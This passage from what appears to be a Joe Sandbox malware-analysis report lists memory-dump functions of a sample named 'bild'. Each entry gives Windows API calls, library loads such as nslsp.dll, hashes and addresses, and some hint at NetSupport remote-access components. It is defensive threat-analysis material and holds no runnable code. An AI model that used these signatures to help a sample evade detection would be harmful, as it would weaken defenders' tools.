                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: HandleLibraryLoadModule
                                                                                      • String ID: NSMTRACE
                                                                                      • API String ID: 4133054770-4175627554
                                                                                      • Opcode ID: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                      • Instruction ID: cf49eb18fee32400038a48a9d82a087192b912de878353ac6c822cd252c7dc11
                                                                                      • Opcode Fuzzy Hash: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                      • Instruction Fuzzy Hash: 50D05EB520033BCFDB489F7995B4269F7EAAB4CA1D3540075E469C2A07EBB0D848C714
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,110302C4), ref: 11025CD8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: psapi.dll
                                                                                      • API String ID: 1029625771-80456845
                                                                                      • Opcode ID: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                      • Instruction ID: d2f0b82a95d6fc878682dccaf19b7a180456f678ee46f3fe844c8dbdc6f5fb44
                                                                                      • Opcode Fuzzy Hash: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                      • Instruction Fuzzy Hash: C9E001B1A11B248FC3B4CF3AA844642FAF0BB18A103118A3ED4AEC3A00E330A5448F80
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102EF80,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 11014F8E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: nslsp.dll
                                                                                      • API String ID: 1029625771-3933918195
                                                                                      • Opcode ID: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                      • Instruction ID: 60eb6736f29bf142f24d4cfcc231741db50fe0cc1946b431100be770a733e412
                                                                                      • Opcode Fuzzy Hash: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                      • Instruction Fuzzy Hash: E7C092B17152388FE3685F7CAC085D2FAE4EB48A91351986EE4B5D3308E6B09C40CFE4
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 11074E1F
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11194245,?), ref: 11074E89
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary_memset
                                                                                      • String ID:
                                                                                      • API String ID: 1654520187-0
                                                                                      • Opcode ID: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                      • Instruction ID: 144a06a128bfe4de4bcaa8ee3b5ec3a734aa963de7831f9780c3e5d6e94517af
                                                                                      • Opcode Fuzzy Hash: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                      • Instruction Fuzzy Hash: 6E218376D04228A7D710DA99EC41FEFFBACEB44325F4045AAE909D7200D7315A55CBE1
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • std::exception::exception.LIBCMT ref: 1105FD93
                                                                                      • __CxxThrowException@8.LIBCMT ref: 1105FDA8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1338273076-0
                                                                                      • Opcode ID: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                      • Instruction ID: 65be3d9b06008521879bde957bfb15225efad016ffb254945ac63f30ffb56918
                                                                                      • Opcode Fuzzy Hash: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                      • Instruction Fuzzy Hash: F5117FBA900619ABC710CF99C940ADAF7F8FB48614F10862EE91997740E774B900CBE1
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _malloc_memmove
                                                                                      • String ID:
                                                                                      • API String ID: 1183979061-0
                                                                                      • Opcode ID: 457b307eca14e29342672ca62ef5147d46d8b4d4f126d6aa85e0778cfe473ab4
                                                                                      • Instruction ID: db33143030e4a9298ca15ccbefe9b49d771c33472961b073c023ff9ae0ea679a
                                                                                      • Opcode Fuzzy Hash: 457b307eca14e29342672ca62ef5147d46d8b4d4f126d6aa85e0778cfe473ab4
                                                                                      • Instruction Fuzzy Hash: 98F0F47AE002666F9741CF2C9844896FBDCDF8A158314C4A2E999CB301D671EC0687E0
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 110883EF
                                                                                      • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070993,00000000,00000000,1118201E,000000FF), ref: 11088460
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalInitializeSection_memset
                                                                                      • String ID:
                                                                                      • API String ID: 453477542-0
                                                                                      • Opcode ID: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                      • Instruction ID: 54b2584c526ac61f8aa3306390e259e673957fd90be6398fea32980b523eb801
                                                                                      • Opcode Fuzzy Hash: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                      • Instruction Fuzzy Hash: EE1157B0911B148FC3A4CF7A88817C7FBE5BB58310F80892E96EEC2200DB716664CF94
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144461
                                                                                      • ExtractIconExA.SHELL32(?,00000000,0004048D,00040459,00000001), ref: 11144498
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExtractFileIconModuleName
                                                                                      • String ID:
                                                                                      • API String ID: 3911389742-0
                                                                                      • Opcode ID: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                      • Instruction ID: eab236796224ce85d4984e15688285b8376dcc0e4438f4162dfbb4c1a1faa056
                                                                                      • Opcode Fuzzy Hash: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                      • Instruction Fuzzy Hash: 3EF0F0787581189FE708DFA0C892FF9B369F794709F444269E912C6184CE706A4C8B51
                                                                                      APIs
                                                                                        • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                      • __lock_file.LIBCMT ref: 11163DFE
                                                                                        • Part of subcall function 1116AF99: __lock.LIBCMT ref: 1116AFBE
                                                                                      • __fclose_nolock.LIBCMT ref: 11163E09
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                      • String ID:
                                                                                      • API String ID: 2800547568-0
                                                                                      • Opcode ID: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                      • Instruction ID: 92e00479c768bfe57184568fb50af5c8f285ad3b4a4164507b2fffc520e9ca87
                                                                                      • Opcode Fuzzy Hash: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                      • Instruction Fuzzy Hash: 5CF0F6348143079ED7119B79D80078EFBA86F0033CF518248C0289A0C0CBFA6521CE56
                                                                                      APIs
                                                                                        • Part of subcall function 11144DC0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,NSM.LIC), ref: 11144DE7
                                                                                        • Part of subcall function 11163FED: __fsopen.LIBCMT ref: 11163FFA
                                                                                      • GetLastError.KERNEL32(?,00EEB898,000000FF,?), ref: 11144ED5
                                                                                      • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00EEB898,000000FF,?), ref: 11144EE5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                      • String ID:
                                                                                      • API String ID: 3768737497-0
                                                                                      • Opcode ID: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                      • Instruction ID: cc8fd34c32098476147d622d57126809c91a32baa97f0e350d3592d26a0b2836
                                                                                      • Opcode Fuzzy Hash: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                      • Instruction Fuzzy Hash: 8D110875D4411AEBD7119F94C9C4A6EF3BCEF85A29F200164FC0497A00E775AD11C7A3
                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 11010774
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LockitLockit::_std::_
                                                                                      • String ID:
                                                                                      • API String ID: 3382485803-0
                                                                                      • Opcode ID: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                      • Instruction ID: 0f97abe7109b731a14a0a5233c6982db04001c22e931a1e4a38e375530e3522e
                                                                                      • Opcode Fuzzy Hash: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                      • Instruction Fuzzy Hash: D9515D74E00645DFDB04CF98C980AADBBF5BF88318F24829DD5869B385C776E942CB90
                                                                                      APIs
                                                                                      • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: QueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3660427363-0
                                                                                      • Opcode ID: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                      • Instruction ID: 1cdda14904265755d753c391d3c49599355d775305d59026304f2c7825c43cec
                                                                                      • Opcode Fuzzy Hash: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                      • Instruction Fuzzy Hash: 5D1193716282655AEB218E14D690BAFFBAAEFC5B24F30836AE51547E04C3329886C750
                                                                                      APIs
